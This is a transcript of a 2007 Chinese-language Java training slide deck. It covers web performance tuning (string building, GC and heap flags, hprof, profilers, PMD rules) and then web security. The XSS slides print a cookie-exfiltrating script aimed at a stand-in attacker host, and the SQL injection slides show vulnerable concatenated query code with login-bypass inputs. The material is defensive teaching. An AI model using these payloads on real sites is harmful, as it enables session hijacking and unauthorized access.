Java Web 程式之效能技巧與安全防護

1

Java Web 程式之效能技巧與安全防護

林信良

教育訓練講師暨技術顧問

昇陽電腦

1

2007 Java Certification Day

2

Agenda

1 – Web 效能概觀

2 – 效能量測工具

3 – 程式碼分析

4 - Web 安全概觀

5 – 跨網站指令稿攻擊（Cross-site scripting）

6 – 隱碼攻擊（SQL Injection）

2

Sun Confidential: Internal Only 3

Web 效能概觀

• 所有程式都受到三種系統限制 > CPU速度

> 記憶體

> 輸出／輸入

Footnote position, 12 pts.


CPU-bound類型的程式

• 著重在提昇程式效率的演算法


記憶體

• Java 有垃圾收集 > 可以沒有顧忌的配置物件？

> 系統中有太多短命的物件？

• 大型物件浪費記憶體 > 建立物件、垃圾收集


輸入／輸出

• 輸出輸入絕對會拖慢程式 > 磁碟存取（檔案讀寫、日誌…）

> 資料庫存取（增、刪、查、找…）

> 網路存取（DNS反查…）


從１到１００

• 撰寫一個程式，可在文字模式上顯示

Footnote position, 12 pts.

HOW DO YOU DO


How do you do

• 在迴圈中經常犯的兩種錯誤 > 非必要的輸出／輸入

> 非必要的建構物件

for(int i = 1; i < 100; i++) {

System.out.print(i + "+");

}

System.out.println(100);


How do you do

• 改進了輸出

String output = "";

for(int i = 1; i < 100; i++) {

output = output + i + "+";

}

output += 100;

System.out.println(output);

一次 IO


How do you do

• 物件的重用（一）

StringBuffer output = new StringBuffer();

for(int i = 1; i < 100; i++) {

output.append(i);

output.append("+");

}

output.append(100);

System.out.println(output); 重用物件


How do you do

• 物件的重用（二）

StringBuffer output = new StringBuffer(300);

for(int i = 1; i < 100; i++) {

output.append(i);

output.append("+");

}

output.append(100);

System.out.println(output); 預設16字元


How do you do

• 執行緒議題

StringBuilder output = new StringBuilder(300);

for(int i = 1; i < 100; i++) {

output.append(i);

output.append("+");

}

output.append(100);

System.out.println(output); JDK 5.0以上


效能量測工具

• 觀察GC -verbosegc

• 程式執行效率 -Xrunhprof

• JDK 5.0之後的工具 jconsole

• Profiler > NetBeans Profiler


觀察GC

• 啟動JVM時的選項，可觀察 > 物件所佔據的時間與空間

> 回收時所釋放的空間

C:\>java -verbosegc -jar "C:\Program Files\Java\jdk1.6.0_01\demo\jfc\

Notepad\NotePad.jar"


觀察GC


觀察GC

• C:\>java -verbosegc -XX:+PrintGCDetails-jar "C:\Program Files\Java\jdk1.6.0_01\demo\jfc\Notepad\NotePad.jar"


觀察GC

• Heap區是分Generation管理的

• 針對不同的Generation採不同的GC演算法


觀察GC

• 預設的JVM假設物件是infant mortality > 在建構之後，很快就會成為垃圾

> 例如Iterator物件

• 物件一開始是分配在Eden > 多數的物件成為垃圾

> 填滿時引發minor collection

> 在當中存活的物件被複製到Tenured generation

• Tenured generation會使用major collection > 通常比較慢，因為包括所有的物件


觀察GC

• GC運行時，應用程式不作任何事 > 呼叫System.gc()

> Heap區太小，預設值都很小

> 頻繁的建構、釋放物件

• 最基本的是調整Heap分配 > Xms

> Xmx

> Xmn


觀察GC

• 預設值通常不適用大型主機 > 初始heap區通常很小，要經過多次major

collection

> 最大heap區通常也不適用

• 簡單的設定 > Server端JVM最好將-Xms和-Xmx設為相同值

> 最好-Xmn值约等於-Xmx的1/3

> 如果每次GC後，heap的剩餘空間是總空間的50%，表示Heap處於健康狀態

> Server端Java程式每次GC後最好能有65%剩餘空間


程式執行效率

• 定期對call stack進行取樣 > 得知目前正在stack頂端的方法

> 可計算哪個部份花費最多執行時間

• java -Xrunhprof:help > java -Xrunhprof:cpu=samples

> java -Xrunhprof:cpu=times


程式執行效率

• java -Xrunhprof:cpu=samples,depth=6 TestHprof

• java.hprof.txt

CPU SAMPLES BEGIN (total = 109) Thu Mar 22 13:54:45 2007

rank self accum count trace method

1 21.10% 21.10% 23 300041 java.lang.AbstractStringBuilder.expandCapacity



4 6.42% 57.80% 7 300046 java.lang.AbstractStringBuilder.append

5 5.50% 63.30% 6 300050 java.lang.String.<init>


7 3.67% 72.48% 4 300048 java.lang.AbstractStringBuilder.append



TRACE 300041: (thread=200001)

java.lang.AbstractStringBuilder.expandCapacity(AbstractStringBuilder.java:99)

java.lang.AbstractStringBuilder.append(AbstractStringBuilder.java:393)

java.lang.StringBuilder.append(StringBuilder.java:120)

TestHprof.addToCat(TestHprof.java:15)

TestHprof.makeString(TestHprof.java:10)

TestHprof.main(TestHprof.java:54)

TRACE 300052: (thread=200001)




TestHprof.makeStringWithLocal(TestHprof.java:28)


TRACE 300047: (thread=200001)




TestHprof.makeStringInline(TestHprof.java:21)



jconsole

• JDK 5.0之後


jconsole


Profiler

• NetBeans Profiler > http://www.netbeans.org/products/profiler/

> http://www.netbeans.org/kb/55/profiler-tutorial.html


效能分析


選擇分析方法


過濾器（Filter）


分析呼叫堆疊與取樣


程式碼分析

• LocalVariableCouldBeFinal > 區域變數只被設值一次時應宣告為 final

• MethodArgumentCouldBeFinal > 方法的參數如果不會被設值則應宣告為 final

• AvoidInstantiatingObjectsInLoops > 偵測是否在迴圈中建立新的物件實體

• UseArrayListInsteadOfVector > 建議以 ArrayList 取代 Vector


程式碼分析

• SimplifyStartsWith > 當字串字面值的長度為 1 時，建議改以 String.charAt(0) 代替 String.startsWith 以增進效能

• UseStringBufferForStringAppends > 建議字串結合以 StringBuffer 取代

• UseArraysAsList > 建議用Arrays.asList 由物件陣列來轉換成 List 而不是以迴圈的方式建立 List

• AvoidArrayLoops > 以 System.arrayCopy 取代迴圈的方式複製陣列

• UnnecessaryWrapperObjectCreation > 建立移除不必要的外覆物件，應直接傳遞原始物件較佳


程式碼分析

• http://pmd.sourceforge.net/

• PMD scans Java source code and looks for potential problems like: > Possible bugs - empty try/catch/finally/switch

statements > Dead code - unused local variables, parameters and

private methods > Suboptimal code - wasteful String/StringBuffer

usage > Overcomplicated expressions - unnecessary if

statements, for loops that could be while loops > Duplicate code - copied/pasted code means

copied/pasted bugs


程式碼分析


Web 安全概觀

• 研究：91％的網站都有漏洞 > Cross Site Scripting

> SQL Injection

> …

> Improper Error Handling


跨網站指令稿攻擊

• Cross-site scripting（XSS）

• 會話劫奪（Session hijacking）

• 釣魚（Phishing）

• 特徵 > 使用者輸入的資料沒有過濾

> 網站直接回送使用者輸出的資料


XSS：Session hijacking

• 例如搜尋功能回送使用者輸入的查詢字串

Could not find any documents including ‘foo’



Could not find any documents including ‘foo’

Could not find any documents including ‘<b>foo</b>’

Search <b>foo</b>



Could not find any documents including

‘<script language=‘javascript’>alert(document.cookie)</script>’

<script language=‘javascript’>alert(document.cookie)</script>



入侵

www.hahaorz.com

www.xssorz.com

http://www.xssorz.com/search?query=foo



入侵

www.hahaorz.com

www.xssorz.com


<script

language='javascript'>document.location="http://ww

w.hahaorz.com/foo" +document.cookie</script>



入侵

www.hahaorz.com

www.xssorz.com


%3Cscript+language%3D%27javascript%27%3Edocu

ment.cookies%3C%2Fscript%3E



入侵

www.hahaorz.com

www.xssorz.com

http://www.xssorz.com/search?query%3Cs

cript+language%3D%27javascript%27%3E

document.cookies%3C%2Fscript%3E

www.e04orz.com



入侵

www.hahaorz.com

www.xssorz.com

<a href =http://www.xssorz.com/search?query%3C

script+language%3D%27javascript%27%3Edocumen

t.cookies%3C%2Fscript%3E

>可以找到很多美女圖^o^</a>

www.e04orz.com



入侵

www.hahaorz.com

www.xssorz.com

www.e04orz.com

可以找到很多猛男圖^o^



入侵

www.hahaorz.com

www.xssorz.com

www.e04orz.com

可以找到很多猛男圖^o^

JSESSIONID=0146B416F…


XSS：Phishing <script language='javascript'>document.location="http://www.svn.com/foo"

+document.cookie</script>

留言版、討論區 http://java.sun.com/forum


XSS：Phishing <script language='javascript'>document.location="http://www.svn.com/foo"

+document.cookie</script>

留言版、討論區 http://java.svn.com/forum

http://java.svn.com/forum


XSS

• 過濾請求資料 > < <

> > >

> <script>


隱碼攻擊

• SQL Injection

Statement statement = connection.createStatement();

String queryString = “SELECT * FROM USER_TABLE WHERE USERNAME=‘” +

username + “’ AND PASSWORD=‘” + password + “’;”;

ResultSet resultSet = statement.executeQuery(queryString);

“SELECT * FROM USER_TABLE WHERE USERNAME=‘” +

username + “’ AND PASSWORD=‘” + password + “’;”

名稱：密碼：


SQL Injection





“SELECT * FROM USER_TABLE WHERE USERNAME=‘caterpillar’ AND

PASSWORD=‘123456’;

名稱：密碼： caterpillar 123456


SQL Injection





“SELECT * FROM USER_TABLE WHERE USERNAME=‘caterpillar’ AND

PASSWORD=‘‘ OR ‘1’=‘1’;

名稱：密碼： caterpillar ‘ OR ‘1’=‘1

總是為true


SQL Injection





“SELECT * FROM USER_TABLE WHERE USERNAME=‘caterpillar’;# AND

PASSWORD=‘‘ OR ‘’;

名稱：密碼： caterpillar’;#

註解符號


SQL Injection

• 使用PreparedStatement

• 過濾請求資料 > 單引號 '

> 雙引號 "

PreparedStatement stmt = conn.prepareStatement(

“SELECT * FROM USER_TABLE WHERE USERNAME=? AND

PASSWORD=?");


自動檢測安全工具

• 在開發程式的過程中帶入安全觀念與工具 > 在程式撰寫階段應用安全掃描工具

> 在測試階段實行滲透（permeation）測試

> 對已上線的產品進行補強


自動檢測安全工具

• Watchfire Web Appscan

• Acunetrix

• Fortify

60

Thanks 林信良

教育訓練講師暨技術顧問

昇陽電腦

60

Java Web 程式之效能技巧與安全防護

Technology

Transcript of Java Web 程式之效能技巧與安全防護